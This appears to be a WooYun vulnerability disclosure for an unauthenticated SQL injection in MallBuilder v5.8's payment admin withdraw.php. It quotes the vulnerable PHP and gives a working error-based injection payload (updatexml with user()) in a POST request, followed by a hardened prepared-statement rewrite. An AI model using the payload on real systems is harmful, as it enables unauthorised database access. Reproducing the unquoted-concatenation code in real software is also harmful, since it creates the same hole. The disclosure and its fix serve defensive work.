2015-06-17: Details reported to the vendor, awaiting vendor action
2015-06-22: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-08-16: Details disclosed to core white hats and relevant domain experts
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public
No login required; the data is returned directly.
Look at payment\admin\withdraw.php:
if($_GET['operation']=='edit'){
    $sql="SELECT a.*,b.*,c.name as supportTimeName FROM ".CASHPICKUP." a left join ".PUSER." b on a.pay_uid=b.pay_id left join ".FEE." c on a.supportTime=c.id where a.id='$_GET[id]'";
    $db->query($sql);
    $de=$db->fetchRow();
    if($_POST['act']=='edit') {
        $add_time=time();
        if($_POST['result']==10) {
            $sql = "update ".CASHPICKUP." set is_succeed='10',censor='$_SESSION[ADMIN_USER]',con='$_POST[con]' where id='$_POST[id]'";
            $db->query($sql);
        }
        if($_POST['result']==20) {
            $sql = "update ".CASHPICKUP." set is_succeed='20',bankflow='$_POST[bankflow]',con='$_POST[con]',check_time='$add_time', censor='$_SESSION[ADMIN_USER]' where id='$_POST[id]'";
            $db->query($sql);
            $sql="update ".CASHFLOW." set statu=4 where order_id='$_POST[id]' and pay_uid='$_POST[userid]'";
            $db->query($sql);
        }
        if($_POST['result']==50) {
            // $_POST[id] is concatenated into the query without quotes, so it lands in the SQL as a bare expression
            $sql = "update ".CASHPICKUP." set is_succeed='50', check_time='$add_time', censor='$_SESSION[ADMIN_USER]',con='$_POST[con]' where id=$_POST[id]";
            $db->query($sql);
            $m=$de['amount']+$de['fee'];
            //---------------------- add back to available funds ($_POST[userid] is also unquoted here)
            $sql = "update ".PUSER." set cash=cash+$m where pay_id=$_POST[userid]";
            $db->query($sql);
            //---------------------- reset the flow record status to 0
            $sql="update ".CASHFLOW." set statu=0 where order_id='$_POST[id]' and pay_uid='$_POST[userid]'";
            $db->query($sql);
        }
        msg("?m=payment&s=withdraw.php");
    }
}
Then construct the request:
http://127.0.0.1/mallbuilderv5.8/?m=payment&s=admin/withdraw&operation=edit
with the POST data:
result=50&id=updatexml(1,concat(0x5c,user()),1)&act=edit
The data is returned directly.
Filter the input.
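A hardened rewrite of the result==50 branch, added here as an example and not MallBuilder's own code. It assumes a PDO connection in $pdo, the same CASHPICKUP/PUSER/CASHFLOW table constants, and that the admin username is passed in as $censor; the identifiers are validated as integers and every value is bound as a parameter instead of being concatenated into the query.

```php
<?php
// Added example (not MallBuilder code): the result==50 branch of withdraw.php
// with integer validation and prepared statements. Assumes a PDO connection
// in $pdo and the CASHPICKUP / PUSER / CASHFLOW constants from the original.
function rejectWithdrawal(PDO $pdo, array $post, string $censor): bool
{
    // The original interpolated $_POST[id] and $_POST[userid] unquoted into
    // the SQL string; here both must be integers or the request is refused.
    $id     = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    $userId = filter_var($post['userid'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || $userId === false) {
        return false;
    }
    $con = (string) ($post['con'] ?? '');
    $now = time();

    $pdo->beginTransaction();
    try {
        // Load the withdrawal once, tied to the user it belongs to, so the
        // amount credited below comes from the record and not from the client.
        $stmt = $pdo->prepare('SELECT amount, fee FROM ' . CASHPICKUP
                            . ' WHERE id = :id AND pay_uid = :uid');
        $stmt->execute([':id' => $id, ':uid' => $userId]);
        $de = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($de === false) {
            $pdo->rollBack();
            return false;
        }
        $m = $de['amount'] + $de['fee'];

        $stmt = $pdo->prepare('UPDATE ' . CASHPICKUP . ' SET is_succeed = 50,'
            . ' check_time = :t, censor = :c, con = :con WHERE id = :id');
        $stmt->execute([':t' => $now, ':c' => $censor, ':con' => $con, ':id' => $id]);

        // Return the funds to the user's available balance.
        $stmt = $pdo->prepare('UPDATE ' . PUSER . ' SET cash = cash + :m WHERE pay_id = :uid');
        $stmt->execute([':m' => $m, ':uid' => $userId]);

        // Reset the flow record status to 0.
        $stmt = $pdo->prepare('UPDATE ' . CASHFLOW . ' SET statu = 0'
            . ' WHERE order_id = :id AND pay_uid = :uid');
        $stmt->execute([':id' => $id, ':uid' => $userId]);

        $pdo->commit();
        return true;
    } catch (PDOException $e) {
        $pdo->rollBack();
        throw $e;
    }
}
```

Wrapping the three updates in one transaction also means a failed credit cannot leave the withdrawal marked rejected without the funds being returned.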
Severity: No impact (vendor ignored)
Ignored at: 2015-09-20 12:11
Vulnerability Rank: 4 (WooYun rating)
None yet